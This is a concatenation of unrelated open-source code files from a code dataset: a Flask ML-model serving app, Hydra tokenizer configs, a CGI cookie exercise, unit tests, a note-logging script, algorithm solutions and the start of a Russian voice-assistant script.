# if user does not select file, browser also\n # submit a empty part without filename\n if file.filename == '':\n 
abort(400, config.ERROR_NO_IMAGE)\n\n img = Image.open(file)\n img.thumbnail(config.MAX_SIZE, Image.ANTIALIAS)\n return np.array(img)[:, :, :3], request.form.get('sessionId')\n\n\ndef handle_text(request):\n if 'text' not in request.form:\n abort(400, config.ERROR_NO_TEXT)\n\n text = request.form['text']\n if len(text) < 1:\n abort(400, config.ERROR_NO_TEXT)\n\n return text, request.form.get('sessionId')\n\n\ndef broadcast_queue_status():\n # Broadcast queue status to all clients\n task_ids = redis_instance.lrange('task_queue', 0, -1)\n task_ids = [task.decode() for task in task_ids]\n tasks_json = json.dumps(task_ids)\n socketio.emit('queue_status', {'data': tasks_json}, broadcast=True)\n return tasks_json\n\n\n@flask_app.route('/notify_client', methods=['post'])\ndef notify_client_route():\n session_id = request.form.get('session_id')\n predictions = request.form.get('predictions')\n task_id = request.form.get('task_id')\n\n if session_id is not None:\n socketio.emit('finished_job', {'predictions': predictions, 'taskId': task_id}, room=session_id)\n\n broadcast_queue_status()\n return '200 OK'\n\n\n@flask_app.route('/status', methods=['get'])\ndef status_route():\n tasks_json = broadcast_queue_status()\n return tasks_json\n\n\n@flask_app.route('/vgg16', methods=['POST'])\ndef vgg_route():\n img, session_id = handle_image(request)\n job = predict_vgg16.delay(img, session_id)\n return json.dumps({'taskId': job.id})\n\n\n@flask_app.route('/mobilenet', methods=['POST'])\ndef mobilenet_route():\n img, session_id = handle_image(request)\n job = predict_mobilenet.delay(img, session_id)\n return json.dumps({'taskId': job.id})\n\n\n@flask_app.route('/inception', methods=['POST'])\ndef inception_route():\n img, session_id = handle_image(request)\n job = predict_inception.delay(img, session_id)\n return json.dumps({'taskId': job.id})\n\n\n@flask_app.route('/review-sentiment', methods=['POST'])\ndef review_sentiment_route():\n text, session_id = handle_text(request)\n job = predict_review_sentiment.delay(text, session_id)\n\n return json.dumps({'taskId': job.id})\n\n\n@flask_app.route('/deeplab', methods=['POST'])\ndef deeplab_route():\n img, session_id = handle_image(request)\n job = predict_deeplab.delay(img, session_id)\n return json.dumps({'taskId': job.id})\n\n\n@flask_app.route('/ssd-inception', methods=['POST'])\ndef faster_rcnn_route():\n img, session_id = handle_image(request)\n job = predict_ssd_inception.delay(img, session_id)\n return json.dumps({'taskId': job.id})\n\n\n@flask_app.route('/outputs/')\ndef serve_images(path):\n return send_from_directory('outputs', path)\n\nlogger.info('Web server starting')\nsocketio.run(flask_app, debug=False, host='0.0.0.0', port=8091)\n\n","repo_name":"EliotAndres/pretrained.ml","sub_path":"containers/tensorflow_models/serve.py","file_name":"serve.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":360,"dataset":"github-code","pt":"53"} +{"seq_id":"10787826639","text":"from dataclasses import field\n\nfrom hydra.core.config_store import ConfigStore\nfrom omegaconf import MISSING\nfrom pydantic.dataclasses import dataclass\n\n\n@dataclass\nclass NormalizerConfig:\n _target_: str = MISSING\n\n\n@dataclass\nclass BertNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.BertNormalizer\"\n clean_text: bool = True\n handle_chinese_chars: bool = True\n strip_accents: bool = True\n lowercase: bool = True\n\n\n@dataclass\nclass LowercaseNormalizerConfig(NormalizerConfig):\n 
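    # Each schema carries a `_target_` dotted path plus that normalizer's
    # constructor fields; Hydra's hydra.utils.instantiate(cfg) is the usual way to
    # resolve such a config into the named object (here
    # tokenizers.normalizers.Lowercase), passing the remaining fields as kwargs.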
_target_: str = \"tokenizers.normalizers.Lowercase\"\n\n\n@dataclass\nclass NFCNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.NFC\"\n\n\n@dataclass\nclass NFDNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.NFD\"\n\n\n@dataclass\nclass NFKCNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.NFKC\"\n\n\n@dataclass\nclass NFKDNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.NFKD\"\n\n\n@dataclass\nclass NmtNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.Nmt\"\n\n\n@dataclass\nclass ReplaceNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.Nmt\"\n pattern: str = MISSING\n content: str = MISSING\n\n\n@dataclass\nclass SequenceNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.Sequence\"\n normalizers: list[NormalizerConfig] = field(default_factory=lambda: [])\n _normalizers_dict: dict[str, NormalizerConfig] = field(default_factory=lambda: {})\n\n\n@dataclass\nclass StripNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.Strip\"\n left: bool = True\n right: bool = True\n\n\n@dataclass\nclass StripAccentsNormalizerConfig(NormalizerConfig):\n _target_: str = \"tokenizers.normalizers.StripAccents\"\n\n\ndef setup_config() -> None:\n cs = ConfigStore.instance()\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"bert_normalizer_schema\",\n node=BertNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"liwer_case_normalizer_schema\",\n node=LowercaseNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"lower_case_normalizer_schema\",\n node=LowercaseNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"nfc_normalizer_schema\",\n node=NFCNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"nfd_normalizer_schema\",\n node=NFDNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"nfkc_normalizer_schema\",\n node=NFKCNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"nfkd_normalizer_schema\",\n node=NFKDNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"nmt_normalizer_schema\",\n node=NmtNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"replace_normalizer_schema\",\n node=ReplaceNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"sequence_normalizer_schema\",\n node=SequenceNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"strip_normalizer_schema\",\n node=StripNormalizerConfig,\n )\n\n cs.store(\n group=\"tokenizer/normalizer\",\n name=\"strip_accent_normalizer_schema\",\n node=StripAccentsNormalizerConfig,\n )\n","repo_name":"emkademy/cybulde-data-preparation","sub_path":"cybulde/config_schemas/tokenization/normalizer_schema.py","file_name":"normalizer_schema.py","file_ext":"py","file_size_in_byte":3550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18528710516","text":"#!C:\\Users\\zx22student3208\\AppData\\Local\\Programs\\Python\\Python311\\python.exe\n\n#trabajar con cookies: Il tratar la informacion que va en la cookie\n# los casos son! 
# el cliente NO me envia cookies -> crear cookie\n# el cliente me envia cookies pero no esta la que busco -> crear cookie # el cliente me envia cookies Y esta la que busco -> Teer cookie y modificar\nimport http.cookies, os\nfrom urllib.parse import urlparse, parse_qs\nru = os. environ. get(\"REQUEST_URI\")\nparametros = urlparse(ru)\nparam = parse_qs(parametros[4])\n\ntexto = param[\"texto\"][0]\n\nif texto.startswith(\"ABC\"): \n print(\"Content-Type: text/html\") \n cookie = http.cookies.SimpleCookie()\n\n if os.environ.get(\"HTTP_COOKIE\") == None: \n cookie[\"empiezaABC\"] = 1 \n cookie[\"empiezaABC\"] [\"expires\"] = \"Wed, 11 Oct 2024 07: 28:00 GMT\" \n print (cookie[\"empiezaABC\"])\n print()\n else:\n cookie. load(os. environ.get(\"HTTP_COOKIE\") ) \n if \"empiezaABC\" not in cookie: \n cookie[\"empiezaABC\"] = texto \n cookie[\"empiezaABC\"][\"expires\"] = \"Wed, 11 Oct 2024 07:28:00 GMT\" \n print(cookie)\n print()\n else:\n cookie[\"empiezaABC\"] = cookie[\"empiezaABC\"] + \" \" + texto \n cookie[\"empiezaABC\"][\"expires\"] = \"Wed, 11 Oct 2024 07: 28:00 GMT\" \n print(cookie)\n print()\n","repo_name":"AaronCordero-VDM/Practicas-SERVIDOR","sub_path":"Examen1ªEv/Ejercicio4/ej4_separaABC.py","file_name":"ej4_separaABC.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23046818377","text":"import unittest\n\nimport sys\n\nfrom test_inputs.sources import *\n\nsys.path.insert(0, \"../../../engine/set/imagestar/\")\nfrom imagestar import *\n\nsys.path.insert(0, \"../../../tests/test_utils/\")\nfrom utils import *\n\nimport numpy as np\nimport mat73\n\nclass TestImageStarEvaluate(unittest.TestCase):\n \"\"\"\n Tests ImageStar evaluation\n \"\"\"\n\n def test_evaluation(self):\n \"\"\"\n Tests evaluation using predicate initialization\n \n eval_input : int -> number of images\n \n V -> Basis matrix\n C -> Predicate matrix\n d -> Predicate vector\n predicate_lb -> predicate lower bound\n predicate_ub -> predicate upper bound\n \"\"\"\n \n test_eval_input = self.read_csv_data(sources[EVALUATION_INIT][EVAL_INPUT_ID])\n test_eval_output = self.read_csv_data(sources[EVALUATION_INIT][EVAL_OUTPUT_ID])\n \n test_V = np.reshape(read_csv_data(sources[CONSTRUCTOR_PREDICATE_BOUNDARIES_INIT][V_ID]), (28,28,1,785))\n test_C = np.reshape(read_csv_data(sources[CONSTRUCTOR_PREDICATE_BOUNDARIES_INIT][C_ID]), (1, 784))\n test_d = read_csv_data(sources[CONSTRUCTOR_PREDICATE_BOUNDARIES_INIT][D_ID])\n test_predicate_lb = read_csv_data(sources[CONSTRUCTOR_PREDICATE_BOUNDARIES_INIT][PREDICATE_LB_ID])\n test_predicate_ub = read_csv_data(sources[CONSTRUCTOR_PREDICATE_BOUNDARIES_INIT][PREDICATE_UB_ID])\n \n test_star = ImageStar(\n test_V, test_C, test_d, test_predicate_lb, test_predicate_ub\n )\n \n try:\n test_result = test_star.evaluate(test_eval_input)\n except Exception as ex:\n completion_flag = False\n process_exception(ex)\n \n self.assertEqual(test_result.all(), test_eval_output.all())\n\n########################## UTILS ##########################\n def read_csv_data(self, path): \n return np.array(list(mat73.loadmat(path).values())[0])\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"V2A2/StarV_temp","sub_path":"tests/set/image_star/test_ImageStar_evaluate.py","file_name":"test_ImageStar_evaluate.py","file_ext":"py","file_size_in_byte":2080,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37811165938","text":"from 
_collections import defaultdict\nclass NetGO:\n def __init__(self, g2gFile, alignFiles):\n self.pC = defaultdict(dict)\n self.CA = defaultdict(list)\n self.GOp = defaultdict(dict)\n self.pGO = defaultdict(dict)\n self.DRACONIAN = True\n self.get_pGO_GOp(g2gFile)\n for alignFile in alignFiles:\n self.get_pC_CA(alignFile)\n def SetIntersect(self, T1, T2):\n '''\n Takes pGO[protein], so a dict of GO terms, 1 meaning the protein\n has been annotated.\n Returns a dict of GO terms as well.\n '''\n out = {}\n if T1.size()>T2.size():\n for g in T2:\n if g in T1:\n out[g]=1\n if T1.size()<=T2.size():\n for g in T1:\n if g in T2:\n out[g]=1\n return out\n \n def K_g(self, g):\n '''\n Takes a GO term as a string, returns K(g) as int\n '''\n if(g in self.GOp):\n return len(self.GOp[g])\n else:\n return 0\n def K_gset(self, T):\n '''\n Takes pGO[p], a dict of GO terms with the names as keys, returns K(T)\n '''\n out=0\n for g in T:\n out+=self.K_g(g)\n return out\n def K_p(self, p):\n '''\n Takes a protein name as a string, returns K(p)\n '''\n if p in self.pGO:\n return self.k_gset(self.pGO[p])\n else:\n return 0\n def K_A2(self, A):\n '''\n Takes a pairwise alignment in the format A[u]=v, where u and v are pairs of proteins.\n Returns K(A)\n '''\n out = 0\n for u in A:\n if u in self.pGO:\n v = A[u]\n if v in self.pGO:\n out+=self.K_gset(self.SetIntersect(self.pGO[u], self.pGO[v]))\n return out\n def K_AC(self, C):\n '''\n C is a dict of clusters in the format {cl:\n '''\n out = 0\n for cl in C:\n #K_C is the K(C) value for each cluster cl in C\n K_C = 0\n #M is a dict of proteins of the following format: {protein:number of times occurring in cl...}\n #T is a dict of GO terms of the following format: {GO term:number of times occurring in cl... }\n #both are across cluster cl\n M, T = defaultdict(int), defaultdict(int)\n numClusterFields=len(C[cl])\n #only calculate K_C if cluster cl has more than one protein\n if numClusterFields>1:\n u=C[cl][0]\n #if the first protein, u, is not a placeholder, then add it to M\n if u!=\"_\" and u!=\"NA\":\n M[u]+=1\n #then, for each GO term annotating protein u, add it to T\n for g in self.pGO[u]:\n T[g]+=1\n #Now, we iterate over all proteins in cluster cl (skipping the first one, which we already processed). 
Add them to M.\n for i in range(1, numClusterFields):\n u=C[cl][i]\n if u==\"_\" or u==\"NA\":\n continue\n M[u]+=1\n #If we are in draconian mode:\n #Check that, for each protein u in M, each GO term g in T annotates u.\n #If the Go term g does not annotate any one of the proteins, then remove it from T.\n if self.DRACONIAN:\n for g in T:\n if g not in self.pGO[u]:\n T.pop(g)\n #If we are not in draconian mode:\n #Increment g's entry in T by one.\n else:\n for g in T:\n self.T[g]+=1\n #If cluster cl has any annotations, and either more than one protein, or one protein that occurs more than once...\n if len(T)>0 and (len(M)>1 or (len(M)==1 and M[u]>1)):\n if self.DRACONIAN:\n #If we are in draconian mode, just add K_gset(T)\n K_C+=self.K_gset(T)\n else:\n #If we are not in draconian mode, weed out any GO terms that annotate 1 or 0 proteins.\n for g in T:\n if T[g]>1:\n K_C+=T[g]*self.K_g(g)/numClusterFields\n out+=K_C\n return out\n def sim_A2(self, A):\n return self.K_A2(A/len(self.GOp))\n def get_pC_CA(self, alignFile):\n lineCount = 0\n for cluster in alignFile:\n lineCount+=1\n for protein in cluster.split(\"\\t\"):\n #set pC\n if lineCount in self.pC[protein]:\n self.pC[protein][lineCount]+=1\n else:\n self.pC[protein][lineCount]=1\n #set CA\n self.CA[lineCount].append(protein)\n def get_pGO_GOp(self, g2gFile):\n for line in g2gFile:\n protein, GOterm = line.split(\"\\t\")[1:3]\n self.pGO[protein][GOterm] = 1\n if protein not in self.GOp[GOterm]:\n self.GOp[GOterm][protein]=1\n else:\n self.GOp[GOterm][protein]+=1\n\n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n ","repo_name":"alexleeuci/various","sub_path":"NetGO.py","file_name":"NetGO.py","file_ext":"py","file_size_in_byte":5361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70866207529","text":"#!/usr/bin/env python3\n\n\"\"\" Helper functions for non-blocking operation of pipes. \"\"\"\n\nimport os\nimport subprocess\nimport sys\n\nif sys.platform == \"win32\":\n # Posted to stackoverflow.com by anatoly techtonik, Dec/29/2015\n\n from ctypes import windll, byref, wintypes, GetLastError, WinError, POINTER\n from ctypes.wintypes import HANDLE, DWORD, BOOL\n # pylint tries to check this code even when run on POSIX platform\n # pylint: disable=import-error\n import msvcrt\n\n\n LPDWORD = POINTER(DWORD)\n PIPE_NOWAIT = wintypes.DWORD(0x00000001)\n ERROR_NO_DATA = 232\n\n\n def subprocess_creationflags():\n \"\"\"\n Returns additional platform-specific flags needed to pass to subprocess\n creation to suppress opening of a \"console window\".\n \"\"\"\n return subprocess.CREATE_NO_WINDOW\n\n\n def set_nonblocking(pipe):\n \"\"\"\n Configure the given pipe handle to be non-blocking when reading from\n it, equivalently to O_NONBLOCK on POSIX platform.\n \"\"\"\n set_named_pipe_handle_state = windll.kernel32.set_named_pipe_handle_state\n set_named_pipe_handle_state.argtypes = [HANDLE, LPDWORD, LPDWORD, LPDWORD]\n set_named_pipe_handle_state.restype = BOOL\n\n handle = msvcrt.get_osfhandle(pipe.fileno())\n\n res = windll.kernel32.set_named_pipe_handle_state(handle, byref(PIPE_NOWAIT), None, None)\n if res == 0:\n raise OSError(GetLastError(), WinError())\n\n\n def read_nonblocking(pipe, length):\n \"\"\"\n Read from a non-blocking pipe. If there is no data return None. 
Any\n other errors raise exception OSError.\n \"\"\"\n try:\n return os.read(pipe.fileno(), length)\n except OSError:\n if GetLastError() != ERROR_NO_DATA:\n raise OSError(GetLastError(), WinError())\n return None\n\n\nelse:\n import fcntl\n\n\n def subprocess_creationflags():\n \"\"\"\n Returns additional platform-specific flags needed to pass to subprocess\n creation. On POSIX platforms this function is not needed and returns 0.\n \"\"\"\n return 0\n\n\n def set_nonblocking(pipe):\n \"\"\"\n Configure the given file descriptor to be non-blocking for read/write.\n \"\"\"\n flags = fcntl.fcntl(pipe, fcntl.F_GETFL)\n fcntl.fcntl(pipe, fcntl.F_SETFL, flags | os.O_NONBLOCK)\n\n\n def read_nonblocking(pipe, length):\n \"\"\"\n Read from a non-blocking pipe. Returns an empty string if there is no data.\n \"\"\"\n #try:\n # return os.read(pipe.fileno(), length)\n #except BlockingIOError:\n # data = None\n return pipe.read(length)\n","repo_name":"tomzox/gtest_gui","sub_path":"gtest_gui/fcntl.py","file_name":"fcntl.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5606448274","text":"from django.conf.urls import url\n\nfrom raffle.views import (\n RaffleListCreateAPIView, RaffleRetrieveUpdateDestroyAPIView, ExecuteRaffleAPIView,\n RaffleApplicationAPIView)\n\nurlpatterns = [\n url(r'^$', RaffleListCreateAPIView.as_view(), name='raffles'),\n url(r'^(?P[0-9]+)/$', RaffleRetrieveUpdateDestroyAPIView.as_view(), name='raffle_details'),\n url(r'^(?P[0-9]+)/execute', ExecuteRaffleAPIView.as_view(),\n name='raffle_execute'),\n url(r'^(?P[0-9]+)/apply', RaffleApplicationAPIView.as_view(),\n name='raffle_apply'),\n\n]","repo_name":"NayaraCaetano/lottery-api","sub_path":"raffle/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":564,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"6198447271","text":"from datetime import datetime\r\nfrom textwrap import fill\r\nfrom os import system, SEEK_END, SEEK_SET\r\nfrom hashlib import blake2b\r\nloop = True\r\nfl = input(\"Note filename?\\n>>> \")\r\nnotelog = open(fl+\".txt\", \"a+\")\r\nHTML_nl = open(fl+\".HTML\", \"a+\")\r\nif HTML_nl.readline()!=\"\\n\":\r\n HTML_nl.write(\"\\n\")\r\nelse:\r\n # Move the pointer (similar to a cursor in a text editor) to the end of the file\r\n HTML_nl.seek(0, SEEK_END)\r\n\r\n # This code means the following code skips the very last character in the file -\r\n # i.e. in the case the last line is null we delete the last line\r\n # and the penultimate one\r\n pos = HTML_nl.tell() - 1\r\n\r\n # Read each character in the file one at a time from the penultimate\r\n # character going backwards, searching for a newline character\r\n # If we find a new line, exit the search\r\n while pos > 0 and HTML_nl.read(1) != \"\\n\":\r\n pos -= 1\r\n HTML_nl.seek(pos, SEEK_SET)\r\n\r\n # So long as we're not at the start of the file, delete all the characters ahead\r\n # of this position\r\n if pos > 0:\r\n HTML_nl.seek(pos, SEEK_SET)\r\n HTML_nl.truncate()\r\nnote_number=0\r\nlineline = \"\\n\"+ \"-\"*80 +\"\\n\"\r\npoundline = \"\\n\"+\"#\"*80 +\"\\n\"\r\ntildeline = \"\\n\"+\"~\"*80 +\"\\n\"\r\nHTML_lineline = \"
<br><hr>\"\r\nnotelog.write(\"#\"*80+\"\\n\"+\"::-BEGIN SESSION-::\\n\")\r\nHTML_nl.write(\"<html><h1>NOTELOG SESSION</h1><hr>\")\r\nwhile loop == True:\r\n\tnote_number+=1\r\n\t_who = input(\"\\nWho?\\n>>> \") +\"\\t\"\r\n\t_when = input(\"\\nWhen? (leave blank for current time)\\n>>> \")\r\n\tif _when == \"\":\r\n\t\t_when = str(datetime.now())\r\n\t_when = _when+\"\\n\"\r\n\t_contact_info = input(\"\\nContact Information?\\n>>> \")+\"\\n\"\r\n\t_what = \">>> \"+input(\"\\nWhat?\\n>>> \")\r\n\t_what = fill(_what, subsequent_indent=\"\\t\")\r\n\tnote_text = \"\".join([\"Note #\",\r\n                      str(note_number),\r\n                      \"\\n\"+\"TimeStamp::\",\r\n                      \"[\"+str(datetime.now())+\"]\",\r\n                      lineline,\r\n                      _who,\r\n                      _when,\r\n                      _contact_info,\r\n                      _what,\r\n                      \"\\n\\n\"\r\n                      ])\r\n\tHTML_note_text = \"\".join([\"<p><b>Note #\",\r\n                      str(note_number),\r\n                      \"</b><br>\"+\"TimeStamp::\",\r\n                      \"[\"+str(datetime.now())+\"]\",\r\n                      HTML_lineline,\r\n                      \"<br><b>\"+_who +\"</b><br>\",\r\n                      _when,\r\n                      \"<br>\",\r\n                      _contact_info,\r\n                      \"<br><i>\",\r\n                      _what,\r\n                      \"</i></p>\"\r\n                      ])\r\n\tnotelog.write(note_text)\r\n\tHTML_nl.write(HTML_note_text)\r\n\thashstamp = blake2b()\r\n\thashstamp.update(bytes(note_text, 'utf-8'))\r\n\tnotelog.write(\"HashStamp::[\"+hashstamp.hexdigest()+\"]\"+tildeline)\r\n\tHTML_nl.write(\"HashStamp::[\"+hashstamp.hexdigest()+\"]\"+HTML_lineline)\r\n\thashstamp=None\r\n\tstop_condition = input(\"\\nAnother Note? [Y/n]\\n>>> \")\r\n\tsystem('cls||clear')\r\n\tif stop_condition == 'n' or stop_condition == 'N':\r\n\t\tloop = False\r\nsession_hashstamp = blake2b()\r\nsession_hashstamp.update(bytes(notelog.read(), 'utf-8')) #This ensures the WHOLE of the notelog, not just a single session is verified as integral by hash \r\nnotelog.write(\"||-END SESSION-||\"+\"\\nSESSION HASHSTAMP::[\"+session_hashstamp.hexdigest()+\"]\" + poundline+\"\\n\")\r\nHTML_nl.write(\"<hr><h1>END SESSION</h1><hr>\"+\"\\nSESSION HASHSTAMP::[\"+session_hashstamp.hexdigest()+\"]\" + \"\\n<hr></html>
\")\r\nnotelog.close()\r\nHTML_nl.close()\r\n","repo_name":"augustrm/maxnote","sub_path":"maxnote_HTML.py","file_name":"maxnote_HTML.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31646748418","text":"# oj t -c \"python main.py\" -d \"./tests/\" \n\n# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\n# import sys\n# import os\n# f = open('../../../input.txt', 'r')\n# sys.stdin = f\n\n# 解説ACする\n\nn,k = map(int,input().split())\na = list(map(int,input().split()))\nmod = 10**9 + 7\n\n## nCkのmodを求める関数\n# テーブルを作る(前処理)\nmax_n = 10**4\nfac, finv, inv = [0]*max_n, [0]*max_n, [0]*max_n\n\ndef comInit(max_n):\n fac[0] = fac[1] = 1\n finv[0] = finv[1] = 1\n inv[1] = 1\n\n for i in range(2,max_n):\n fac[i] = fac[i-1]* i% mod\n inv[i] = mod - inv[mod%i] * (mod // i) % mod\n finv[i] = finv[i-1] * inv[i] % mod\n\ncomInit(max_n)\n\n# 二項係数の計算\ndef com(n,k):\n if(n < k):\n return 0\n if( (n<0) | (k < 0)):\n return 0\n return fac[n] * (finv[k] * finv[n-k] % mod) % mod\n\ndp = [0] * (n+1)\ndp[0] = fac[n]\nfor i in range(k):\n dp2 = [0] * (n+1)\n for j in range(n+1):\n for x in range(a[i]+1):\n if j + x > n:\n break\n dp2[j+x] += (dp[j] * com(n-x, a[i]-x) % mod) * finv[x]\n dp2[j+x] %= mod\n dp,dp2 = dp2,dp\n\nans = dp[-1]\nprint(ans)\n\n\n","repo_name":"komajun365/competitive_programming","sub_path":"others/dwacon6th-prelims/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72295721129","text":"import numpy as np\nimport os\nimport pandas as pd\nfrom sklearn import preprocessing\nfrom tqdm import tqdm \nimport time\nimport sys\nimport torch\n\nclass PreProcesser:\n \n @staticmethod\n def no_expert_knowledge(data_io):\n df = data_io.dataframe_raw\n prune_cols = []\n for col in data_io.columns_raw:\n if len(col) >= 5:\n if col[-5:-2] == \"(t-\" and col[-1] == \")\" and \"1\" <= col[-2] <= \"5\":\n prune_cols.append(col)\n for col in prune_cols:\n df = df.drop(col, axis=1)\n return df\n\n @staticmethod\n def transfer_to_sequence(x_data, y_data, device):\n size = len(x_data)\n sequence = []\n for i in range(size):\n sequence.append(np.array([x_data[i], y_data[i]]))\n return torch.FloatTensor(np.array(sequence)).to(device)\n\nif __name__ == \"__main__\":\n try:\n from data_utils.get_input import Data_IO\n except:\n from get_input import Data_IO\n data_path = \"./data/NSC_Si_Content_Timedelay_Data_CN.xlsx\"\n data_io = Data_IO(data_path=data_path)\n pre_process = PreProcesser()\n pre_process.no_expert_knowledge(data_io)\n","repo_name":"lebronlihd/key-indicator_prediction","sub_path":"data_utils/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"29514649039","text":"from typing import List\n\ndef twoSum(nums: List[int], target: int) -> List[int]:\n\n sortednums = []\n for i, value in enumerate(nums):\n sortednums.append([value, i]) \n sortednums = sorted(sortednums)\n left = 0 \n right = len(nums) -1\n while left < right:\n if sortednums[left][0] + sortednums[right][0] > target:\n right -= 1\n elif 
sortednums[left][0] + sortednums[right][0] < target:\n left += 1\n else:\n return [sortednums[left][1], sortednums[right][1]]\n \n\nnums = [2,7,11,15]\ntarget = 9\nprint(twoSum(nums=nums, target=target))\n\n","repo_name":"xianergoo/PythonTab","sub_path":"leetcode/two_sum.py","file_name":"two_sum.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39513309099","text":"# Imported before anything else to overwrite env vars!\n\nimport os\nimport sys\n\n\"\"\"\nThere are several options:\n1) running in pycharm\n second argument is \"test\"\n2) running pytest at the CLI\n first argument is the path to pytest and ends pytest\n3) running pytest using the script at /bin/tests\n first argument is the path to pytest and ends pytest\n4) running in some other context (e.g. in prod)\n first argument does not end pytest\n second argument is not test\n\nArguments to the application will be slightly different in each case\n\nSo, in order to set test variables we need to look in slightly different places\n\nThe /bin/tests file also runs mypy to do type checking. This needs DEBUG=1 set too\n\nRunning pytest directly does not always load django settings but sometimes needs these environment variables.\nWe use pytest-env to let us set environment variables from the closest pytest.ini\n\nWe can't rely only on pytest.ini as some tests evaluate this file before its environment variables have been read\n\"\"\"\nrunner = sys.argv[0] if len(sys.argv) >= 1 else None\n\ncmd = None\nif runner:\n cmd = sys.argv[1] if len(sys.argv) >= 2 else None\n\n if cmd == \"test\" or runner.endswith(\"pytest\") or runner.endswith(\"mypy\"):\n print(\"Running in test mode. Setting DEBUG and TEST environment variables.\")\n os.environ[\"DEBUG\"] = \"1\"\n os.environ[\"TEST\"] = \"1\"\n","repo_name":"PostHog/posthog","sub_path":"posthog/settings/overrides.py","file_name":"overrides.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"31492657107","text":"from copyreg import constructor\r\nimport apiai, json, re\r\nimport pyttsx3\r\nimport speech_recognition as sr\r\nimport webbrowser\r\nimport subprocess\r\nimport time\r\nimport psutil\r\nimport pyautogui as pag\r\nimport eel\r\nfrom threading import Thread\r\nimport os\r\nimport random\r\nimport pygame\r\n\r\n#функция для удаление файлов, в дальнейшем планируется \r\n#использовать подход записи файлов для голосовых сообщений с телефона\r\n@eel.expose\r\ndef delete_file(file):\r\n if os.path.isfile(file):\r\n os.remove(file)\r\n print(\"success\")\r\n else: print(\"File doesn't exists!\")\r\n\r\n#добавление проигроваемых звуков, проигрывание вступления \r\npygame.init()\r\nsongLodaing = pygame.mixer.Sound('output/loading.mp3')\r\nsongExecutes = pygame.mixer.Sound('output/executes.mp3')\r\nsongDisappearance = pygame.mixer.Sound('output/disappearance.mp3')\r\nsongAppearance = pygame.mixer.Sound('output/appearance.mp3')\r\npygame.mixer.music.set_volume(2)\r\nclock = pygame.time.Clock()\r\nsongLodaing.play()\r\n\r\n#инициализация графики \r\neel.init(\"web\")\r\n\r\n#Инициализация синтезатора голоса \r\ntts = pyttsx3.init()\r\nrate = tts.getProperty('rate')\r\ntts.setProperty('rate', rate-40)\r\nvolume = tts.getProperty('volume')\r\ntts.setProperty('volume', volume+0.9)\r\nvoices = tts.getProperty('voices')\r\nNumberOfHelper = len(voices)\r\n\r\n#Поиск голосового пакета Татьяна\r\ni 
